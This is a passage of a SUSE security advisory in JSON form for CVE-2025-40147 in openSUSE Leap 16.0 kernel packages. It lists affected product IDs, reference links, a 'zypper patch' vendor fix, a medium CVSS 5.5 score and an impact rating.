"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40147",
"url": "https://www.suse.com/security/cve/CVE-2025-40147"
},
{
"category": "external",
"summary": "SUSE Bug 1253344 for CVE-2025-40147",
"url": "https://bugzilla.suse.com/1253344"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
